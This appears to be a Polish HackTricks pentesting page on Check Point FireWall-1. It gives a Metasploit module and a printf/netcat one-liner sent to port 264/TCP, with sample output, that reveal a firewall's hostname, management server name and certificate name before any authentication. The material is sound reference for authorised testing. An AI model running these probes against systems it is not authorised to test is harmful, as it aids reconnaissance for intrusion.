264 - Pentesting Check Point FireWall-1

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Możliwe jest interakcja z zaporami CheckPoint Firewall-1, aby odkryć cenne informacje, takie jak nazwa zapory ogniowej i nazwa stacji zarządzającej. Można to zrobić, wysyłając zapytanie na port 264/TCP.

Uzyskiwanie nazw zapory ogniowej i stacji zarządzającej

Za pomocą żądania pre-autoryzacyjnego można uruchomić moduł, który jest skierowany na CheckPoint Firewall-1. Poniżej przedstawiono niezbędne polecenia do wykonania tej operacji:

use auxiliary/gather/checkpoint_hostname
set RHOST 10.10.10.10

Po uruchomieniu moduł próbuje skontaktować się z usługą Topologii SecuRemote firewalla. Jeśli operacja zakończy się sukcesem, potwierdza obecność firewalla CheckPoint i pobiera nazwy zarówno firewalla, jak i hosta zarządzającego SmartCenter. Oto przykład, jak może wyglądać wynik:

[*] Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[+] Appears to be a CheckPoint Firewall...
[+] Firewall Host: FIREFIGHTER-SEC
[+] SmartCenter Host: FIREFIGHTER-MGMT.example.com
[*] Auxiliary module execution completed

Alternatywna metoda odkrywania nazwy hosta i nazwy ICA

Inną techniką jest bezpośrednie wysłanie polecenia, które wysyła określone zapytanie do zapory ogniowej i analizuje odpowiedź w celu wyodrębnienia nazwy hosta i nazwy ICA zapory. Polecenie i jego struktura są następujące:

printf '\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00' | nc -q 1 10.10.10.10 264 | grep -a CN | cut -c 2-

Wynik tego polecenia zawiera szczegółowe informacje dotyczące nazwy certyfikatu (CN) i organizacji (O) firewalla, jak pokazano poniżej:

CN=Panama,O=MGMTT.srv.rxfrmi

Odwołania

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Last updated